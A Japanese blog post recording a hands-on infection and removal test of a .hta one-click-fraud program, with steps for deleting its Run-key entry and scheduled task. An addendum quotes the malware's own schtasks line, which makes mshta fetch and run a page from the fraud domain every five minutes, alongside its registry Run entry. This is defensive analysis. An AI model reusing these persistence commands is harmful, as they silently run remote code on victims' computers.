それでは感染実験です。 あまりやりたくないんですけどね。 まぁ皆さんの参考になれば。 |
---|
さて、おもむろに、DLした movie.hta ファイルをクリックしてみることにしましょうか。 そうそう、画面キャプチャーを起動しておかないと。 |
なんて言いましょうかね。。 ガッカリです。 こんなことになってしまいました。 そういえば、ソースネクストを使っていれば、感染しないんですね。忘れていました。(ぇ この機能は、かなり前から実装されていました。 仕方ないから、セキュリティを切って実験しないと・・・ イヤな予感はこれだったんですよ。 何がイヤかというと、セキュリティを切ったら本物のワームの餌食になるかも知れないじゃないですか。 ワンクリウェアに通信させなくちゃいけないから、LANケーブルを抜くわけにも行かないし。 しようがないなぁ・・・・ |
==ご注意== ソースネクストはお守りにはなりますけど、駆除できるわけではありません。 感染後に入れても無駄です。 一般に、セキュリティアプリの中では信頼性に欠けるといわれることが多いです。 ワンクリウェアに強いのは、システム監視機能の部分です。 |
さて、それではやってみましょう。 ブラウザがDonutなのがなんですけど、たぶん、IEが立ち上がるのかなと思います。 Donutが立ち上がるとすれば、窓のサイズやら位置やらは無効ですねw おっとぉ・・・ 全ての機能を無効にしても、まだ保護が働いています。 困ったものですね(苦笑 |x・)・・・・どうしよう・・・ |
苦労の末、無事感染することができました。(ヤレヤレ・・・ まぁこんなのがゾロゾロと画面を占領したら気が滅入りますよね。 それでは経過報告しましょうか。 画面下のステータスバーには、IEが2つしか起動していないんですけど、SS撮るの忘れちゃいました(汗; 画面は3つ出ています。 他の2枚は普通に閉じられます。 |
一番前の画面が mshta.exe によって表示されているものです。 最前面には指定されていないので、後ろに隠すことはできますけど、ちょっと×をクリックする気にはなれません。 それでは様子を見てみましょう。 |
このページにフォーカスすれば、こんなアラートが表示されています。 前説したように、私は 『有料利用申し込み画面』 さえ見ていません。 当然、『料金』 などと言われる筋合いはありません。 |
それではタスクマネージャーを見てみましょう。 mshta.exe が走っています。 ここでこのプロセスを終了させれば、現れた 『閉じにくい窓』 も閉じます。 でも、ここでは直ちに CCleaner を起動しましょう。 |
ツールタブの 『スタートアップ』 を見てみると、HKCU〜RUN エントリーに 〜〜\mshta http://ferachio-tonikakusuki.net〜〜 が見えます。 これを停止すればいいんですけど、やっぱり削除しましょう。 これで再起動。 |
何にも出てきません。 これで駆除は完了しました。 |
簡単でしたね。 今回、私はワンクリウェアをDLしましたから、もちろんウェア本体がPCの中に残っています。 私にとっては研究材料なので、それでなければ困ります。 感染してしまった皆さんは、たぶん、直接実行していると思われますから、インターネット一時ファイルしか残っていません。 放っておけばそのうち消えます。 |
こんな簡単なワンクリウェアだけではありません。 フォルダを作ってウェアを保存しておくものもありますから、いぬさんのページを参照して、適切に処置してください。 いずれにしても、.hta タイプのワンクリウェアは、自動起動を止めれば駆除したことになります。 ゴミ掃除までやれば完璧というわけです。 以上、ワンクリウェア感染>>駆除実験でした。 |
ワンクリウェアには、他にも .exe タイプも残っています。 こちらは対応するアンチウィルスを探して駆除するのが早いでしょう。 もちろん、これもタスクマネージャーからプロセスを停止し、レジストリエントリを削除、本体のファイルを消せば駆除できます。 それで駆除できないものでも、セーフモードでレジストリを削除できるでしょう。 ただ、.exe の場合は、レジストリキーや本体ファイルを探すのに少し苦労します。 .hta タイプではその苦労がありません。 単純に mshta.exe を目標にするだけで探せますから。 |
最近の.htaワンクリウェア 2010/7/9追記 |
スケジューラーを使って繰り返し表示しているんですね。 私のテスト環境が2000ですから気付いていませんでした。 追記しておきます。 |
ワンクリウェアの記述(参照サイト:99.ars.0manko.jp<<ワンクリウェアサイトです。不用意にアクセスしないように。) Run "schtasks.exe /create /tn 007d〜〜e08 /tr ""mshta http://99.ars.0manko.jp/reg2.php?cid=007d〜〜e08"" /sc minute /mo 5 /F" スケジューラーにID 007d〜〜e08 を新しくセットしています。5分ごとにタスクが実行される設定です。 これは、RegWrite "HKCU\〜〜\Run\system_boot_007d〜〜e08"で設定されたワンクリウェアのIDです。 レジストリのRUNエントリの記述以外にタスクスケジューラーでも同じURLを開くようにセットされていますから、スケジューラーも抹殺する必要がありますね。 MicroSoftのページです。 このページはXP向けですから、他のOSの場合は検索してください。まぁ応用できると思いますけど。 完全駆除をするには、レジストリのRUNエントリの削除、プログラムIDの削除、タスクスケジュールの削除、この3点が必要になっています。 症状を止めるには、RUNエントリとスケジュールの削除でいいですし、msconfigで自動起動を止め、スケジュールを削除でもかまいません。 なお、スケジュールを消すときに必要なプログラムID情報は、レジストリのRUNエントリに同じ記述がありますから、CCleanerで見たときにメモしておくと良いでしょう。 誤って必要なスケジュールを削除してもいけません。 いきなり削除ではなく、スケジュールを停止して様子を見、当たっていれば削除、という手順を踏んでください。 |
2010/7/6 追記 いぬさんが引っ越しなさろうとしています。 引っ越し先をご覧下さい。 これまでの画像掲示板をどうするかはまだ聞いていません。リンク切れの場合はこちらをご覧下さい。 |